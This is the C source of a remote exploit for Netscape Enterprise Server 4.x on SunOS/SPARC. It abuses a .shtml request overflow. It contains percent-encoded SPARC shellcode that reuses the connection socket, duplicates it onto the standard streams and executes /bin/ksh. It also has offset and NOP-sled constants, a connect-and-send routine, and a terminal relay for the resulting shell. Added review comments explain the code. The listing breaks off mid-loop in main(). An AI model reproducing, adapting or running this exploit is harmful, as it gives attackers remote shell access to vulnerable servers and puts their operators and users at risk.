/*
 * PRIVATE DO NOT DISTRIBUTE - Only for t0s exploit
 *
 * Netscape Enterprise Server 4.x remote exploit
 * Abusing .shtml request overflow
 *
 * Tested against SunOS 5.7 sun4u sparc SUNW,Ultra-5_10
 * Must compile on most gcc OS
 *
 * The Dark Raver
 */

/*
 * NOTE(review): the fifteen header names appear to have been stripped when
 * this listing was captured (only the bare #include directives survive), so
 * the file does not build as shown; restore them before compiling.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* When non-zero, main() echoes each request fragment to stdout right after
 * writing it to the socket. */
int debug=1;

/*
 * Payload string sent inside the request, written as URL percent-encoded
 * bytes (four encoded bytes per line, one per SPARC instruction word). The
 * trailing comment on each line is the author's own annotation of that word;
 * the string ends with the literal "/bin/ksh" named in the author's comment.
 */
char hell[]=
/* search the socket */
"%aa%1d%40%15" // xor %l5, %l5, %l5
"%ac%05%64%02" // add %l5, 1026, %l6
"%ac%25%a0%01" // dec %l6
"%90%05%40%16" // add %l5, %l6 , %o0
"%82%10%20%f3" // mov 0xf3, %g1
"%91%d0%20%08" // ta 8
"%90%22%20%01" // dec %o0 - getpeername()
"%80%a2%3f%ff" // cmp %o0, -1
"%12%bf%ff%fa" // be -6
/* dup2(sock,0) */
"%aa%1d%40%15" // xor %l5, %l5, %l5
"%90%05%40%16" // add %l5, %l6, %o0
"%92%10%20%09" // mov 9, %o1
"%94%22%40%09" // sub %o1, %o1, %o2
"%82%10%20%3e" // mov 0x3e, %g1
"%91%d0%20%08" // ta 8
/* dup2(sock,1) */
"%aa%1d%40%15" // xor %l5, %l5, %l5
"%90%05%40%16" // add %l5, %l6, %o0
"%92%10%20%09" // mov 9, %o1
"%94%05%60%01" // add %l5, 1, %o2
"%82%10%20%3e" // mov 0x3e, %g1
"%91%d0%20%08" // ta 8
/* dup2(sock,2) */
"%aa%1d%40%15" // xor %l5, %l5, %l5
"%90%05%40%16" // add %l5, %l6, %o0
"%92%10%20%09" // mov 9, %o1
"%94%05%60%02" // add %l5, 2, %o2
"%82%10%20%3e" // mov 0x3e, %g1
"%91%d0%20%08" // ta 8
/* execve("/bin/ksh") */
"%20%bf%ff%ff" // bn,a
"%20%bf%ff%ff" // bn,a
"%7f%ff%ff%ff" // call
"%90%03%e0%24" // add %o7, 32, %o0
"%92%02%20%10" // add %o0, 16, %o1
"%98%03%e0%24" // add %o7, 32, %o4
"%c0%23%20%08" // st %g0, [%o4+8]
"%d0%23%20%10" // st %o0, [%o4+16]
"%c0%23%20%14" // st %g0, [%o4+20]
"%82%20%3f%f5" // sub %g0, -0xb, g1
"%91%d0%20%08" // ta 8
"/bin/ksh";

//0xf99e1360
/*
 * Constants used when main() assembles the request. OFFSET/OFFSET2 and NOP
 * are percent-encoded 32-bit words; the doubled "%%" presumably means they
 * pass through a printf-family format string before being sent -- TODO
 * confirm, the part of main() that uses them lies past the end of this
 * listing. NOPNUM, ALIGN, EXTRA and CUTREPAD are plain counts whose exact
 * role is likewise not visible here.
 */
#define OFFSET "%%f9%%9e%%13%%40"
#define OFFSET2 "%%f9%%9e%%13%%60"
#define NOPNUM 40
#define NOP "%%80%%1b%%c0%%1f"
#define ALIGN 2
#define EXTRA 1000
#define CUTREPAD 932

/*
 * Relay loop between the local terminal and the socket s: whatever arrives
 * on s is copied to stdout, whatever is typed on stdin is copied to s.
 * Never returns; every error and end-of-stream path calls exit(0).
 *
 * Review notes: the return values of both write() calls are ignored, so a
 * short or failed write silently drops data. FD_SET() is undefined for
 * s >= FD_SETSIZE and that is not checked here.
 */
void terminal(int s)
{
    char buf[1024];
    fd_set rfds;
    fd_set fds;
    int i;

    printf("Entering terminal...\n");
    /* fds is the master set; select() overwrites the set it is handed, so a
     * working copy (rfds) is refreshed from it on every iteration. */
    FD_ZERO(&fds);
    FD_SET(0,&fds);
    FD_SET(s,&fds);
    while(1) {
        memcpy(&rfds,&fds,sizeof(fds));
        i=select(s+1,&rfds,NULL,NULL,NULL);
        if (i==-1) {
            printf("Select()\n");
            exit(0);
        }
        /* With a NULL timeout select() does not time out, so a return of 0
         * is not expected here; this is effectively a defensive exit. */
        if (i==0) {
            printf("Session closed\n");
            exit(0);
        }
        if (FD_ISSET(s,&rfds)) {
            /* read() returning 0 (peer closed) or -1 (error) both end the session */
            if ((i=read(s,buf,sizeof(buf)))<1) {
                printf("Session closed\n");
                exit(0);
            }
            write(1,buf,i);
        }
        if (FD_ISSET(0,&rfds)) {
            /* same treatment for end-of-file or error on stdin */
            if ((i=read(0,buf,sizeof(buf)))<1) {
                printf("Session closed\n");
                exit(0);
            }
            write(s,buf,i);
        }
    }
}

main(int argc, char **argv)
{
    int sock;
    struct sockaddr_in sa;
    struct hostent *hp;
    int c;
    int i;
    int x;
    extern int optind;
    extern char *optarg;
    int len;
    int padd;
    char cbuf[4000];

    if(argc<3) {
        printf("Usage: ns4x \n");
        exit(-1);
    }
    optind+=2;
    while((x = getopt(argc, argv, "o:n:a:f:")) != EOF) {
        switch (x) {
        default:
            printf("Too busy to code this :) sorry... maybe next time...\n");
        }
    }
    if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
        perror("gethostbyname()");
        exit(0);
    }
    if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("socket()");
        exit(0);
    }
    sa.sin_family=AF_INET;
    sa.sin_port=htons(atoi(argv[2]));
    memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
    if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
        perror("connect()");
        exit(0);
    }
    printf("Connected to %s\n",argv[1]);
    printf("Sending codez\n");
    sprintf(cbuf, "GET /");
    write(sock, cbuf, strlen(cbuf));
    if(debug) printf("%s", cbuf);
    for(i=0;i